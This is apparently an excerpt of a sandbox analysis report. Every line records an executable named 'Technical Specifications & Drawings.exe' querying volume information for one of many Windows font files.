          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
